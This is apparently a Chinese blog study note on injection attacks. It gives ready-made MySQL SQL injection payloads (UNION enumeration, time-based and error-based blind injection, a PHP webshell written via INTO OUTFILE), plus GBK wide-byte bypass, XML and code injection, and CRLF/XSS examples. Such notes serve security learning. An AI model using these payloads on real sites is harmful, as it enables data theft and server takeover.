2. 程式人生 > >註入攻擊

註入攻擊

阿新 發佈:2018-08-26
encode 單引號 nio 輸入數據 轉義符 否則 統一 開啟 返回

註入攻擊本質是把用戶的輸入當做代碼執行,包括:sql註入、XML註入等

發生條件:1.用戶能夠控制輸入;2.原本要執行的代碼拼接了用戶的輸入,導致執行了用戶的輸入

1.sql註入

sql語言是解釋型語言,因此存在先天性的安全缺陷

原理什麽的就不提了,從判斷是否存在sql註入開始吧~

1.1 判斷是否存在sql註入

http://localhost/test.php?id=1  and 1=1    頁面正常

http://localhost/test.php?id=1  and 1=2    顯示出錯或空白

出現以上情況的,就是存在了sql註入,因為,id裏的and 1=1影響了sql語句的執行

爆數據庫版本:

http://localhost/test.php?id=1 and ord(mid(version(),1,1))>51

發現返回正常頁面,說明數據庫是mysql,並且版本大於4.0,支持union查詢,反之是4.0以下版本或者其他類型數據庫。

爆字段:

http://localhost/test.php?id=1 and order by 10   出錯說明字段數小於10
http://localhost/test.php?id=1 and order by 5    出錯說明字段數大於5
http://localhost/test.php?id=1 and order by 8    出錯說明字段數小於8

用二分查找比較好

爆表:

采用union查詢的方式進行爆表

http://localhost/test.php?id=1 and 1=2 union select 1,2,3,4,5,6

可以發現返回了幾個數字,把聯合查詢中對應的數字替換成需要的sql語句進行查詢即可

有用的函數:

database()          當前連接的數據庫名

system_user()       數據庫的系統用戶

current_user()      當前登錄數據庫的用戶名

last_insert_id()    最後對數據庫進行插入操作的id

1.2 盲註

盲註主要分為三種類型:基於時間的盲註;基於報錯的盲註;布爾型盲註

基於時間的盲註

sleep(n)            延遲n秒 

if(expr1,expr2,expr3)   如果 expr1 為真,則 IF()函數執行expr2語句; 否則 IF()函數執行expr3語句

BENCHMARK(count,expr)   重復執行表達式expr count次

利用sleep函數:

?id=1’ and if(ascii(substr((要執行的語句),1,1))=115,sleep(5),1)#
?id=1’ union select (if(substring((要執行的語句),1,1)=char(115),sleep(5),1)),2,3#

例:

?id=1’ and if(ascii(substr(database(),1,1))=115,sleep(5),1)#
?id=1’ union select (if(substring(database(),1,1)=char(115),sleep(5),1)),2,3#

當錯誤的時候會有5 秒的時間延時。

利用BENCHMARK()函數

?id=1’ and (select 1 from (select concat((ascii(substr((要執行的語句),1,1))=115),benchmark(50000000,encode(‘msg’,’key’)))x from information_schema.tables group by x)a)#
?id=1’ and if(ascii(substr((要執行的語句),1,1))=115,benchmark(50000000,encode(‘msg’,’key’)),1)#
?id=1’ union select (if(substring((要執行的語句),1,1)=char(115),benchmark(50000000,encode(‘msg’,’key’)),1)),2,3#

當結果正確的時候,運行encode(‘msg’,’key’)操作50000000 次,會占用一段時間。
benchmark()函數可以測試某些特定操作的執行速度。該函數只是簡單地返回服務器執行表達式的時間,而不會涉及分析和優化的開銷。

基於報錯的盲註

十大報錯函數:

floor():
select *from test where id = 1 and (select 1 from (select count(*),concat(語句,floor(rand(0)*2))x from information_schema.tables group by x)a)-- 
?id=1‘ union Select 1,count(*),concat(你希望的查詢語句,floor(rand(0)*2))a from information_schema.columns group by a--+

extracvalue():
select * from test where id=1 and (extractvalue(1,concat(0x7e,(語句),0x7e)))-- 

updatexml():
select * from test where id=1 and (updatexml(1,concat(0x7e,(語句),0x7e),1))-- 

geometrycollection():
select * from test where id=1 and geometrycollection((select * from(select * from(語句)a)b));

multipoint():
select * from test where id=1 and multipoint((select * from(select * from(語句)a)b));
 
polygon():
select * from test where id=1 and polygon((select * from(select * from(語句a)b));

multipolygon():
select * from test where id=1 and multipolygon((select * from(select * from(語句)a)b));

linestring():
select * from test where id=1 and linestring((select * from(select * from(語句)a)b));

multilinestring():
select * from test where id=1 and multilinestring((select * from(select * from(語句)a)b));

exp():
select * from test where id=1 and exp(~(select * from(語句)a));

1.3 其他操作

如果當前數據庫用戶具有寫權限,攻擊者可以將信息寫入本地磁盤中,如web目錄

?id=1 union all select table_name,table_type,engine from information_schema.tables where table_schema=‘mysql‘order by table_name desc into outfile ‘/path/location/on/server/www/schema.txt‘

寫入webshell:

?id=1 union select "<? system($_REQUEST[‘cmd‘]);?>",2,3,4 into outfile "/var/www/html/temp/c.php"--

讀系統文件:LOAD_FILE()

寫文件:INTO DUMPFILE()和 INTO OUTFILE()

命令執行

利用“用戶自定義函數”,即UDF來執行命令

編碼問題

基於字符集的註入問題

當mysql使用GBK編碼時,0xbf27會被認為是一個雙字節字符,但是在進入數據庫之前,雙字節字符會被認為是兩個字符,某些函數,如PHP的addslashes()函數,或當magic_quotes_gpc開啟時,會在特殊字符前增加一個轉義字符“\”。

當輸入0xbf27時,會進行轉義,變成0xbf5c27(“\”的ascii碼是0x5c),但是0xbf5c又可以組成一個字符,因此,轉義符被吞掉,0x27不會被轉義,還是單引號。

解決方法:統一數據庫、操作系統、web應用所使用的字符集,以避免各層對字符的理解存在差異。

SQL column truncation

當mysql的sql_mode選項被設置為default時,即沒有開啟STRICT_ALL_TABLES 選項時,對輸入的超長值只會顯示warning而非error,即插入成功(截斷超長部分),若精心設置,可能會出現重復數據的情況,造成越權訪問。

2.XML註入

與sql註入很相似,用戶能夠控制數據的輸入;程序拼湊數據。

修復:對用戶輸入數據中的“保留字符”進行轉義,如用 lt 替換 <

3.代碼註入

由一些不安全的系統函數造成,比如:eval()和system()

提交命令:/index.php?arg=1;phpinfo()

4.CLRF註入

CR:\r,0x0d

LF:\n, 0x0a

可以用來註入HTTP頭,因為HTTP頭通過\r\n來分割,若沒有過濾,又把用戶輸入的數據放在HTTP頭中,可能造成安全隱患。

如,兩次CRLF註入到cookie

?argc=1%0d%0a%0d%0a<script>alert(/XSS/);</script> HTTP/1.1

註入攻擊

相關推薦

ADO.NET攻擊和防禦

pda date upd user int execute 編號 數據 .net 當在添加程序中註入攻擊時在控制臺應用程序中可以這樣寫: 請輸入編號:U006 請輸入用戶名:無敵 請輸入密碼:1234 請輸入昵稱:呵呵 請輸入性別:True 請輸入生日:2000-1-1 請

ADO.NET 占位符(防SQL 攻擊

microsoft 維護 text conn 提前 輸入密碼 sql 密碼 ati 當在添加程序中註入攻擊時在控制臺應用程序中可以這樣寫: 請輸入編號:U006 請輸入用戶名:無敵 請輸入密碼:1234 請輸入昵稱:呵呵 請輸入性別:True 請輸入生日:2000-1-1

小試XML實體攻擊

如果 utf nco target 參數 發送 類型 log 本地 基礎知識 XML(Extensible Markup Language)被設計用來傳輸和存儲數據。關於它的語法,本文不準備寫太多,只簡單介紹一下。 XML基本知識 1 2 3 4 5 <?

關於在線文本編輯器防XSS攻擊問題

使用 行處理 som 註入攻擊 .get str 代碼 自動 這樣的 跨站腳本攻擊,又稱XSS代碼攻擊,也是一種常見的腳本註入攻擊。例如在下面的界面上,很多輸入框是可以隨意輸入內容的,特別是一些文本編輯框裏面,可以輸入例如<script>alert(‘這是一個頁

SQL攻擊

對待 得到 驅動器 可用 member nmp available aid 用戶信息 SQL註入攻擊是黑客對數據庫進行攻擊的經常使用手段之中的一個。隨著B/S模式應

新人開車——攻擊

禁止 選項 stat 包含漏洞 lec 開啟 表名 2.6 benchmark 一.1 SQL註入   1、註入攻擊的本質,是把用戶輸入的數據當做代碼執行。這裏有兩個關鍵條件:     (1)用戶能夠控制輸入;     (2)原本程序要執行的代碼,拼接了用戶輸入的數據。

2017-2018-2 20179205《網絡攻防技術與實踐》第十一周作業 SQL攻擊與實踐

tac 原理 HERE 經典的 事先 不存在 編程語言 行數 顯示 《網絡攻防技術與實踐》第十一周作業 SQL註入攻擊與實踐 1.研究緩沖區溢出的原理,至少針對兩種數據庫進行差異化研究 緩沖區溢出原理 ??在計算機內部,輸入數據通常被存放在一個臨時空間內,這個臨時存放的空

XXE(外部實體攻擊

版本 標簽 編碼 fix think 實體 名稱 利用 報錯 XXE(XML External Entity 外部實體註入) DTD(Document Type Definition 文檔類型定義)用來為XML文檔定義語義約束,可以嵌入在XML文檔中(內部聲明)也可以獨立的

谷歌瀏覽器存嚴重漏洞,黑客能夠劫持和攻擊

也會 跨站點 img 建議 更新 技術 推出 splay 資源   谷歌安全研究人員Micha?Bentkowski在5月下旬發現並報告了谷歌瀏覽器存在嚴重漏洞,影響所有主要操作系統(包括Windows,Mac和Linux)的網頁瀏覽軟件。   Chrome安全團隊指出:

SQL攻擊及其解決方法

優勢 相同 res 對象 數據庫服務器 指定 from eight 處理 SQL註入攻擊:   當程序中出現了SQL拼接時,當輸入的值為jack‘#或者‘jack‘ or ‘1=1時,會讓SQL語義發生改變,因為SQL語句中出現了SQL的關鍵字(# or 1=1),造成數據

攻擊

encode 單引號 nio 輸入數據 轉義符 否則 統一 開啟 返回 註入攻擊本質是把用戶的輸入當做代碼執行,包括:sql註入、XML註入等 發生條件:1.用戶能夠控制輸入;2.原本要執行的代碼拼接了用戶的輸入,導致執行了用戶的輸入 1.sql註入 sql語言是解釋型語言

Web安全篇之SQL攻擊

特殊字符 dst 解釋 數字 情況 介紹 登錄界面 mail 加密 在網上找了一篇關於sql註入的解釋文章,還有很多技術,走馬觀花吧 文章來源:http://www.2cto.com/article/201310/250877.html ps:直接copy,格式有點問題~

Java應用開發中的SQL攻擊

包括 安全防護 sql註入 什麽 由於 應用程序 輸入數據 數據庫防火墻 進行 1. 什麽是SQL註入攻擊? SQL註入攻擊是黑客對數據庫進行攻擊的常用手段之一。隨著B/S模式應用開發的發展,使用這種模式編寫應用程序的程序員越來越多。但是由於程序員的水平及經驗參差不齊,相當

PHP獲取IP地址的方法,防止偽造IP地址攻擊

false online ESS -a null del known sdn 信息 原文:PHP獲取IP地址的方法,防止偽造IP地址註入攻擊PHP獲取IP地址的方法 /** * 獲取客戶端IP地址 * <br />來源:ThinkPHP * &

ADO。Net(二)——防止SQL攻擊

多少 ext args create 查詢 屬性 匹配 拼接 註入 規避SQL註入 如果不規避,在黑窗口裏面輸入內容時利用拼接語句可以對數據進行攻擊 如:輸入Code值 p001‘ union select * from Info where ‘1‘=‘1

WEB服務端安全---攻擊

serve bst 創建 web .com pfile 足夠 高級技巧 codec 註入攻擊是web領域最為常見的攻擊方式,其本質是把用戶輸入的數據當做代碼執行,主要原因是違背了數據與代碼分離原則,其發生的兩個條件:用戶可以控制數據輸入;代碼拼接了用戶輸入的數據,把數據當做

sql學習筆記,什麽是sql,如何尋找漏洞,如何攻擊,如何預防

產生 回收 異常 學習 .com 就會 inf get 識別 什麽是SQL註入 如何理解sql註入? sql註入是一種將sql代碼添加到輸入參數中,傳遞到sql服務器解析並執行的一種攻擊手法 示例: 本地一段代碼為get獲取id值,輸出實際

dljd_013_使用PreparedStatement避免SQL攻擊

返回 flag 拼接 scan user bool 改變 tac mysq 一、使用PreparedStatement來避免SQL註入攻擊示例   這裏我只提供源碼、測試類及結果截圖信息、建庫/表的語句詳見上一集 package edu.aeon.logon;

WAF——針對Web應用發起的攻擊,包括但不限於以下攻擊類型:SQL、XSS跨站、Webshell上傳、命令、非法HTTP協議請求、非授權文件訪問等

授權 文件訪問 http協議 火墻 針對 str sql 包括 fire 核心概念 WAF Web應用防火墻(Web Application Firewall),簡稱WAF。 Web攻擊 針對Web應用發起的攻擊,包括但不限於以下攻擊類型:SQL註入、XSS跨站、Websh

記錄一次網站漏洞修復過程(三):第二輪處理(攔截SQL、跨站腳本攻擊XSS)

cat nbsp ebe 嵌入 網頁 防止 記錄 用戶輸入 light 在程序編寫的時候采用參數化的SQL語句可以有效的防止SQL註入,但是當程序一旦成型,再去修改大量的數據庫執行語句並不是太現實,對網頁表單上輸入進行校驗是易於實現的方法。在webForm 頁面中開啟校驗屬